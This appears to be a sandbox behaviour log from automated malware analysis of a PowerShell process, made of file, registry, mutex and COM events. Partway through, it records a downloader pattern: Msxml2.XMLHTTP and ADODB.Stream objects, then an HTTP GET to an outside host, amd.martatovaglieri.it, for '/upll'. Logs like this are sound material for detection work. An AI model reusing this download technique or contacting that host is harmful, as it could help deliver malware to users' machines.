| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733, type = file_type |
|
2 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733, size = 4096, size_out = 4096 |
|
2 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733, size = 5, size_out = 5 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733, size = 4096, size_out = 2818 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733, size = 4096, size_out = 0 |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, type = file_attributes |
|
3 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, type = file_type |
|
2 | |
| File | Read | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, size = 4096, size_out = 2384 |
|
1 | |
| File | Read | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, size = 688, size_out = 0 |
|
1 | |
| File | Read | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, size = 4096, size_out = 0 |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, type = file_attributes |
|
2 | |
| File | Create | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, type = file_type |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\en-US\Microsoft.PowerShell.Utility.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\en\Microsoft.PowerShell.Utility.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\PSGetModuleInfo.xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll\Microsoft.PowerShell.Commands.Utility.dll, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Utility, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_attributes |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_attributes |
|
3 | |
| File | Create | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_type |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_type |
|
2 | |
| File | Read | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, size = 4096, size_out = 4096 |
|
5 | |
| File | Read | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, size = 4096, size_out = 664 |
|
1 | |
| File | Read | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, size = 4096, size_out = 0 |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_attributes |
|
2 | |
| File | Create | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_type |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = PSModuleAutoLoadingPreference |
|
6 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = PSModuleAutoLoadingPreference |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| File | Get Info | filename = STD_ERROR_HANDLE, type = file_type |
|
1 | |
| COM | Get Class ID | cls_id = F6D90F16-9C73-11D3-B32E-00C04F990BB4, prog_id = Msxml2.XMLHTTP |
|
1 | |
| COM | Create | interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Environment | Get Environment String | name = PSModuleAutoLoadingPreference |
|
1 | |
| COM | Get Class ID | cls_id = 00000566-0000-0010-8000-00AA006D2EA4, prog_id = ADODB.Stream |
|
1 | |
| COM | Create | interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Environment | Get Environment String | name = temp, result_out = C:\Users\Nd9E1FYi\AppData\Local\Temp |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = temp, result_out = C:\Users\Nd9E1FYi\AppData\Local\Temp |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = amd.martatovaglieri.it, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /upll |
|
1 | |
| Environment | Get Environment String | name = PSModuleAutoLoadingPreference |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL |
|
2 | |
| Environment | Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| File | Get Info | filename = C:\ProgramData\Oracle\Java\javapath, type = file_attributes |
|
16 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
16 | |
| File | Get Info | filename = C:\Windows, type = file_attributes |
|
16 | |
| File | Get Info | filename = C:\Windows\System32\Wbem, type = file_attributes |
|
15 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psd1, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
2 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules |
|
2 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.psd1, type = file_attributes |
|
1 | |
| File | Read | size = 4096, size_out = 4096 |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PcsvDevice\PcsvDevice.psd1, type = file_attributes |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Security\PSGetModuleInfo.xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Security\Microsoft.PowerShell.Security.dll, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Security, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Security\Microsoft.PowerShell.Security.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Security, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Security\Microsoft.PowerShell.Security.dll, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Security\Microsoft.PowerShell.Security.psd1, type = file_attributes |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Security\Microsoft.PowerShell.Security.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, type = file_type |
|
2 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 43, size_out = 43 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 9, size_out = 9 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 11, size_out = 11 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 3483 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_41c67784-5a05-4d3a-a346-47e4d3e9d32f, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_41c67784-5a05-4d3a-a346-47e4d3e9d32f, type = file_type |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_41c67784-5a05-4d3a-a346-47e4d3e9d32f, size = 1815 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, type = file_type |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096 |
|
4 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 3546 |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, type = file_type |
|
2 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 43, size_out = 43 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 9, size_out = 9 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
